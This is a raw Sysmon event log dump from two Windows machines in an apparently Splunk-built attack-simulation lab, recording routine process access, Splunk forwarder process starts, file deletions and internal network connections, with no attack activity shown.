 10341000x8000000000000000299896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1ABA-6216-8D07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1ABA-6216-8D07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.322{C8EA50B7-1ABA-6216-8D07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.735{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D481A39B84C91EA670839F9BA74121B,SHA256=CA42B302022032C3F67797A01C9E5FB923ACE372647E845416DBA6C43A7E7CF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:03.417{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB076B430730D50D9A70E7A7CB012B8,SHA256=56389940D1D30641E58E9BEE3C2CBE3D7DCFA344D69D3F825B58CAF32C4E1764,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.567{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1ABB-6216-8E07-000000003802}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.551{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1ABB-6216-8E07-000000003802}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.551{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1ABB-6216-8E07-000000003802}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.553{C8EA50B7-1ABB-6216-8E07-000000003802}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:04.735{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=890B596C26EB531631696307F5664B59,SHA256=3BCC71D10FE3B146836E6E7981C9FA76A79520E124AD0ECEC844A296E10DD075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:04.479{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB70C6CDB94DA295AC64872E8AEC12C9,SHA256=C3651B1BE63F97A0F38772B287FA442EA29467D9B06FC9803461EDD7F9A9B4A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.628{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49669-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:03.628{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49669-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000299914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:05.750{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A7E6880BFC004B539C3ABB66A413221,SHA256=CA1BDEC0555D0B201A6A8EA8270658B5E6622A5193D5A4EC36BDD29BAFA092C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:03.703{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51804-false10.0.1.12-8000- 23542300x8000000000000000223709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:05.496{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF14B424F4E4B740F6FD8F81242CBBC8,SHA256=DFA3EF0CAD7CCD95811F07813C431CC39FC0BF87894BFF764431CE102775CDAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:06.818{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=572F190FBF71389FC447302441325CDA,SHA256=5415A7581C71D3065A2D6D966A4E2189C3CCFE01387C786138510002B00C767E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:06.589{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=067B1A7130FCC233880B466AD0D2EB65,SHA256=65589D9149D933C0929A93899CC28AEA83BE1E099CCB99162E9A83BC605ED69D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:07.620{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6277059DC0205CA5A7DAD5743259B34A,SHA256=573BB3EE588CC44B37730D738D1A1561A01CE5237EB21152D6D91BB5B9F32902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:07.818{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8D1394AF66D7B605126C399E67EA2AA,SHA256=E9B5653629CCA813ADE008F089A8DFD36BB9D7DA6B15E7E29D7D2F7B6A95BD69,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:04.596{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49670-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:08.651{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6781EB7753908FF06EEFB9F11B6BC629,SHA256=58F13F0BE142C90AD4DC5185827FF602FF154089CDBDB4C1BB2B9E539C4D0608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:08.849{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B727DD3297717474667FC0FAB430271,SHA256=035B1E80169C0B441252646F1D5B0B45AB1F75BE15F5447F43941BB7A0E12BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:09.885{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=709D17BC6BDF9D69E9797353610B0BA5,SHA256=BC98CC4B0C4E417CEAE7DCD8E24D05CD9F60B5F13D79FAF95AE30811C2741695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:09.884{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25B621CC88FD871F900E8786E43CD56C,SHA256=5E32981EBA1DCE91F0B164A8D3DAE50B9E24B4570520CDA3282C4D302EDF9C94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:10.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD0AAB09454AAF546324D62464DCF149,SHA256=42C53EF6213B3436AAA7425E453C1C3A394B7A434605E37B0A88A8CBB8D18761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:11.948{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9691B3BD9410B947D2FD40AC059C83D,SHA256=4D88C089B6C5A0B732FEA2EFB25A9A1CF3A1C5DCFDB7058DF31193000E9F54A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:09.640{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51805-false10.0.1.12-8000- 23542300x8000000000000000223715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:11.120{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E4B5E172A25EE06758EF3AFAE106358,SHA256=0D4D4F82CC00C7717C494A6B69857974D16B944977E4B797FCB221E0FE60A553,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:09.677{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49673-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:12.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6670549B2D5D450467409FED2F0E9762,SHA256=2389032CBE283EBA449AB6F320EEE48ED6D74D1675AA3E89DC0DAB0BE2F4CEC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:12.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D74F9F892C3BD2D331A3AF011BC602,SHA256=590F4B4A13EF40B791A381A6C6271B1EBF2D866073509BC221ADF06E4C96DDC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:13.986{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF4F97360BB9A0564D02853C7D5493E,SHA256=FCBAD72A434A5BAC5E37D99EFEF9BE1B7871AA77108392F28C7C22481FE9342F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:13.166{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48BE5F1BBED4B870C5CDD6FA00BFC8DC,SHA256=84B01F8F8634BC86EF50FD22C644D02AEBB923A3807CD510D5759CAABE1C8E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:14.197{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25FB8D948A928637DFEAB9E461E77734,SHA256=8B798982244A21F6B47F8C2680C0E0A29F02064A8FF61FB16F882831A6AF7A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:15.244{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E278622C707FD320978624E504D463F8,SHA256=3A102819112DE3086C69A7D791FF66ED3F4D462BD060BE0D0BA4B3254CB42CC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:15.459{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-172MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:15.018{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A55DCF0C09BBB9C410678944407DDBB,SHA256=9DFFEDDF67ECE1B30D75BF3012F9E125ABE006527BD7D19FD0E89DE69AEA66B2,IMPHASH=00000000000000000000000000000000falsetrue 